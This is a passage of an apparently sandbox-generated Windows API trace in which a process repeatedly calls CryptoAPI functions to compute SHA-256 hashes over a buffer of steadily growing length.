1 [0262.393] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.393] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x580, dwFlags=0x0) returned 1 [0262.393] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.393] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c0f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c0f0, pdwDataLen=0x1ee448) returned 1 [0262.393] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.394] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.394] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.394] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.394] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0262.394] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.394] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c120, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c120, pdwDataLen=0x1ee448) returned 1 [0262.394] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.394] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.394] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.395] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.395] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0262.395] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.395] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c150, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c150, pdwDataLen=0x1ee448) returned 1 [0262.395] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.395] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.395] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.396] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.396] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0262.396] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.396] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c180, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c180, pdwDataLen=0x1ee448) returned 1 [0262.396] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.396] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.396] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.397] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.397] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x600, dwFlags=0x0) returned 1 [0262.397] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.397] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ba30, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ba30, pdwDataLen=0x1ee448) returned 1 [0262.397] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.397] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.397] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.397] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.397] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x620, dwFlags=0x0) returned 1 [0262.398] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.398] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c200, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c200, pdwDataLen=0x1ee448) returned 1 [0262.398] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.398] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.398] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.398] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.398] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x640, dwFlags=0x0) returned 1 [0262.398] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.398] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c260, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c260, pdwDataLen=0x1ee448) returned 1 [0262.398] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.398] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.398] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.399] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.399] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x660, dwFlags=0x0) returned 1 [0262.399] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.399] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c290, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c290, pdwDataLen=0x1ee448) returned 1 [0262.399] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.399] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.399] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.400] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.400] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x680, dwFlags=0x0) returned 1 [0262.400] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.400] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c2c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c2c0, pdwDataLen=0x1ee448) returned 1 [0262.400] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.400] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.400] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.401] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.401] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0262.401] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.401] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c2f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c2f0, pdwDataLen=0x1ee448) returned 1 [0262.401] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.401] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.401] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.402] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.402] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0262.402] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.402] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c320, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c320, pdwDataLen=0x1ee448) returned 1 [0262.402] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.402] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.402] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.402] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.402] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0262.402] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.403] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c350, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c350, pdwDataLen=0x1ee448) returned 1 [0262.403] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.403] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.403] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.403] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.403] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x700, dwFlags=0x0) returned 1 [0262.403] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.403] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c380, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c380, pdwDataLen=0x1ee448) returned 1 [0262.403] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.403] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.404] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.404] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.404] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x720, dwFlags=0x0) returned 1 [0262.404] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.404] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c3b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c3b0, pdwDataLen=0x1ee448) returned 1 [0262.404] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.404] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.404] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.405] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.405] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x740, dwFlags=0x0) returned 1 [0262.405] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.405] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c3e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c3e0, pdwDataLen=0x1ee448) returned 1 [0262.405] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.405] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.405] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.406] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.406] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x760, dwFlags=0x0) returned 1 [0262.406] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.406] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c410, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c410, pdwDataLen=0x1ee448) returned 1 [0262.406] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.406] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.406] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.407] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.407] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x780, dwFlags=0x0) returned 1 [0262.407] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.407] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c440, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c440, pdwDataLen=0x1ee448) returned 1 [0262.407] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.407] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.407] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.408] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.408] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0262.408] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.408] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c470, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c470, pdwDataLen=0x1ee448) returned 1 [0262.408] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.408] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.408] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.409] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.409] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0262.409] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.409] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c4a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c4a0, pdwDataLen=0x1ee448) returned 1 [0262.409] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.409] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.409] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.409] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.409] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0262.409] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.409] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c4d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c4d0, pdwDataLen=0x1ee448) returned 1 [0262.409] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.410] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.410] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.410] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.410] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x800, dwFlags=0x0) returned 1 [0262.410] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.410] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c500, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c500, pdwDataLen=0x1ee448) returned 1 [0262.410] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.410] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.410] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.411] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.411] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x820, dwFlags=0x0) returned 1 [0262.411] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.411] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c530, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c530, pdwDataLen=0x1ee448) returned 1 [0262.411] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.411] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.411] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.412] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.412] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x840, dwFlags=0x0) returned 1 [0262.412] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.412] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c560, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c560, pdwDataLen=0x1ee448) returned 1 [0262.412] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.412] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.412] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.413] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.413] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x860, dwFlags=0x0) returned 1 [0262.413] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.413] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c590, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c590, pdwDataLen=0x1ee448) returned 1 [0262.413] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.413] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.413] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.413] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.414] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x880, dwFlags=0x0) returned 1 [0262.414] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.414] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c5c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c5c0, pdwDataLen=0x1ee448) returned 1 [0262.414] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.414] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.414] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.414] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.414] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0262.414] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.414] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c5f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c5f0, pdwDataLen=0x1ee448) returned 1 [0262.414] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.414] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.415] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.415] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.415] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0262.415] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.415] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31c620, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31c620, pdwDataLen=0x1ee448) returned 1 [0262.415] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.415] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.415] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.416] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.416] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0262.416] 